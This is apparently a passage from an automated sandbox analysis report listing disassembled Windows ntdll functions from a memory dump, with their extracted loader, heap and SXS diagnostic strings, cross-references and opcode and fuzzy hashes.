                                                      • Opcode ID: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                      • Instruction ID: ffc2855d4cdd807b773d4aaf49c85acf61b3be01ff40185fd86a117b11f2db48
                                                      • Opcode Fuzzy Hash: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                      • Instruction Fuzzy Hash: C6D1EC31600786EFDB2ADF69C490AA9BBF1FF4A704F188059F4869B752C734E980CB14
                                                      Function 011489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                                      • VerifierDebug, xrefs: 01148CA5
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                                      • VerifierFlags, xrefs: 01148C50
                                                      • VerifierDlls, xrefs: 01148CBD
                                                      • HandleTraces, xrefs: 01148C8F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      • API String ID: 0-3223716464
                                                      • Opcode ID: f9d647630bda8483c0bf9e9f4d0f7d9d053106e4c86c9b0fdf3345ad48e3fa50
                                                      • Instruction ID: 0a62a1d83cb1d3aa0c5288f87f17379eec03100a8d5c4ecb9a8bd747b1618da1
                                                      • Opcode Fuzzy Hash: f9d647630bda8483c0bf9e9f4d0f7d9d053106e4c86c9b0fdf3345ad48e3fa50
                                                      • Instruction Fuzzy Hash: 5C9147B1A06306EFD72EEFA8C8C0B9B7BE5AB55F18F050468FA816B241C7709C41C795
                                                      Function 010CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      • API String ID: 0-1109411897
                                                      • Opcode ID: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                                      • Instruction ID: 6c576a21c4d5a32d32ed94806f0c6bd70d5d9b60c0e90f372600e8512cddb05e
                                                      • Opcode Fuzzy Hash: 8503aa8a14e5e358bb7784359d3261ca2ab58657dfb7fae6c0de18ac30cfabba
                                                      • Instruction Fuzzy Hash: BDA24874A0566A8FDB68DF18C8887ADBBB1BF45704F1442EED94DA7690DB309E81CF01
                                                      Function 010F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-792281065
                                                      • Opcode ID: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                                      • Instruction ID: bb122d0767eed827f1255b902a931de53011330c9a34c4de2877a98cbd88fb2b
                                                      • Opcode Fuzzy Hash: 96cc3ae89819b2a3b3cb3ca513110bf9417558e95d8a9a3fddb5d45f43974e39
                                                      • Instruction Fuzzy Hash: 12915D30B017119BDB3DEF58D885BAE7BA1BF91B18F04013CE6507BA85DB75A841C791
                                                      Function 010B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
                                                      • apphelp.dll, xrefs: 010B6496
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01119A01
                                                      • LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01119A2A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-204845295
                                                      • Opcode ID: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                                      • Instruction ID: b6ecafaff20d3bfd58c411c607e5d39bc88ef73859be617b9c3583112308b33e
                                                      • Opcode Fuzzy Hash: 436a1ff5e51d14341a79b250e33acef5aa675ac85ed739980adf5ac66a7f9290
                                                      • Instruction Fuzzy Hash: CE51E3712183089FD728DF24D891BABB7E8FB84748F40092DF5E59B194D731E944CB92
                                                      Function 010F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
                                                      • SXS: %s() passed the empty activation context, xrefs: 01132165
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      • Opcode ID: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                                      • Instruction ID: 6e127fdb177a1f582d6d2d2b23d2fe43980669737708a549d70b95a3496ffef8
                                                      • Opcode Fuzzy Hash: 21691e1e7edf569738767204979976a785be1cc402d1dd4fdb493d16ae34a359
                                                      • Instruction Fuzzy Hash: A5310536B40325B7EB259A998C42F6A7B68EBA5A90F05405DFB44AB244D370DE01C6E1
                                                      Function 010FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
                                                      • LdrpInitializeProcess, xrefs: 010FC6C4
                                                      • LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01138170
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      • Opcode ID: 53c435831351197a4f4f5a4ce973e8125717574e9833266219a374734c4f17b8
                                                      • Instruction ID: 02472dba63e018ba4b8d85e01c9022a1059ab4364075cd3145f0935ca88a5f24
                                                      • Opcode Fuzzy Hash: 53c435831351197a4f4f5a4ce973e8125717574e9833266219a374734c4f17b8
                                                      • Instruction Fuzzy Hash: 3A3125717483069FD228EF29D986E5AB7D4EFD4B14F04056CF9C56B291D720EC04C7A2
                                                      Function 0110096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      • API String ID: 1404860816-0
                                                      • Opcode ID: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                      • Instruction ID: 851b17f4cb71c027e1d195b89e615a79eba8706e372ee2490eea5fb9035ca3b7
                                                      • Opcode Fuzzy Hash: 82d2598ec8009ac33d971c497c3154241b21281ae9f23168c7c4a038c2518ce3
                                                      • Instruction Fuzzy Hash: FA427071900715DFDB29CF28C840BAAB7F4FF48314F1445A9E989EB285E7B0A985CF61
                                                      Function 010CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      • Opcode ID: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                      • Instruction ID: 37d5dce524c0e2fba15246abd82e495db571a7721696b9ee90bbe3c3332ece33
                                                      • Opcode Fuzzy Hash: 6e1cf58f85800d0dc3ae322e7aa4058e530d143a63de08ecc13f547e6cd4d025
                                                      • Instruction Fuzzy Hash: 6CC1577460838ACBD715DF58C044B6EB7E4BB98B04F04896EF9D68B251E734CA49CF52
                                                      Function 010F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializeProcess, xrefs: 010F8422
                                                      • @, xrefs: 010F8591
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 010F8421
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      • Opcode ID: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                      • Instruction ID: 5dfabe56bfb77d231692168b9260ba66100c9d621794ed4900cd4113a8538ae2
                                                      • Opcode Fuzzy Hash: 7a8bbfc2e2fe51a0db39d35f2124850aabf2bb0f20e9d440b1b4de0ec1631643
                                                      • Instruction Fuzzy Hash: 7A91BD71608345AFDB26EF25CC45EABBAE8BF84B44F40492EFAC496140E774D904CB62
                                                      Function 010F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • .Local, xrefs: 010F28D8
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                                      • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                      • Instruction ID: 74f3399708ea131046782e5ef1d07d06cadb9c6ad6c5824e7fb6c4f4ce7bdcf8
                                                      • Opcode Fuzzy Hash: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                      • Instruction Fuzzy Hash: E1A1D13190522ADBDB24DF68CC85BA9B3B0BF98354F1541EDDA88AB651D730DE80CF90
                                                      Function 010C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                      • Instruction ID: 6e3dbe82ba4a9379c3cbbce05b2c7fcc2059d1d3c243e9333404edaf7d2a3cda
                                                      • Opcode Fuzzy Hash: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                      • Instruction Fuzzy Hash: E071C1719043059FCB21DF18C884F9B7BA8AFA4B54F10056CF9888B286D775D589CFD2
                                                      Function 010E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 0112A998
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                                      • apphelp.dll, xrefs: 010E2462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                      • Instruction ID: 1c5ca71988d748b52b917a07663a39288ea535c53b8989a5c6cb1e12b6f24173
                                                      • Opcode Fuzzy Hash: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                      • Instruction Fuzzy Hash: C6316AB5B00312ABDB3D9F5AE8C5AAA7BB9FF84B04F150039E960A7244D77058D1CB40
                                                      Function 010D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • HEAP: , xrefs: 010D3264
                                                      • HEAP[%wZ]: , xrefs: 010D3255
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      • API String ID: 0-617086771
                                                      • Opcode ID: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                      • Instruction ID: 475ed4feeeba332068d94cd1781b20629714955c81ecaef2b9f86ab9743b526f
                                                      • Opcode Fuzzy Hash: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                      • Instruction Fuzzy Hash: 8392BA71A043499FDB29CF68C440BAEBBF1FF48314F1880A9E999AB391D735A941CF51
                                                      Function 010D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                      • Instruction ID: 99100de74a788c03772876d0d40a2bdfc7f790d6981f5bf6684758563e397acd
                                                      • Opcode Fuzzy Hash: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                      • Instruction Fuzzy Hash: 31F1AF70A00606DFEB19CF68C894BAEB7F6FF45304F1481A8E59A9B385D734E981CB51
                                                      Function 010E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: $@
                                                      • API String ID: 2994545307-1077428164
                                                      • Opcode ID: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                      • Instruction ID: 52e4931020aabdec7165356128bde71e178995303650eef2eae0c0729f136ea3
                                                      • Opcode Fuzzy Hash: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                      • Instruction Fuzzy Hash: FFC29F716083519FDB69CF29C844BAFBBE5AF88704F04892DFAC987241D775D844CB92
                                                      Function 010BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                      • Instruction ID: 2d864cebcfe6f4160263d437f8f11a5fc63a3424430284e06413e83bd80f5e33
                                                      • Opcode Fuzzy Hash: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                      • Instruction Fuzzy Hash: F1A16B719556299BDB35EF68CC88BEAF7B8EF48700F1001E9E909A7250D7359E84CF90
                                                      Function 010E0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpCheckModule, xrefs: 0112A117
                                                      • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-161242083
                                                      • Opcode ID: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                      • Instruction ID: 904566c8b69e316d976c34525813e0f37571152098203e2bc0bb6e2f4cec75f6
                                                      • Opcode Fuzzy Hash: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                      • Instruction Fuzzy Hash: 1971FF70A0030A9FDB29EF69C984AAEB7F4FF44704F14447DE992AB605E374A991CB40
                                                      Function 010D0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-1334570610
                                                      • Opcode ID: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                      • Instruction ID: ca6bb4458fa4b1531834fbf30c01973d007c1d70096f737b70df047d46f21856
                                                      • Opcode Fuzzy Hash: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                      • Instruction Fuzzy Hash: 6661B070604301DFDB69CF28C484BAABBE2FF45714F148599F4998F296D770E891CB91
                                                      Function 010FC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                                      • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                      • Instruction ID: 568623773298b4247406192f69ae01e7b12bb89c63f8b6846575928830609e07
                                                      • Opcode Fuzzy Hash: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                      • Instruction Fuzzy Hash: 5F4120B1504309ABD728EB69D986F9B77E8BF58710F00493EFA94D7290E770D840CB91
                                                      Function 0117C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                                      • @, xrefs: 0117C1F1
                                                      • PreferredUILanguages, xrefs: 0117C212
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                      • Instruction ID: e1ab0fdb7325ed18f4a15093bf5b3f9bf81291367bc537749ab778e8c461bd67
                                                      • Opcode Fuzzy Hash: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                      • Instruction Fuzzy Hash: 4B415671E0020AEBDF19DFD8C855FEEB7B9AB54704F14416AE605F7280D7749A44CB90
                                                      Function 01154144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                      • Instruction ID: 35d0219708588b32bea3c68e3fdda6c9c2a8e877761f23db1ce044e0647c9bd9
                                                      • Opcode Fuzzy Hash: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                      • Instruction Fuzzy Hash: 56412272A00368CBEB2ADBD9D844BADBBB4FF55380F140059DD61EBB81E7349981CB11
                                                      Function 01144755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpCheckRedirection, xrefs: 0114488F
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                      • Instruction ID: 906cdcc8ceb0423c0ada20adad46296675d75bd555b8591246a1126a6d581c54
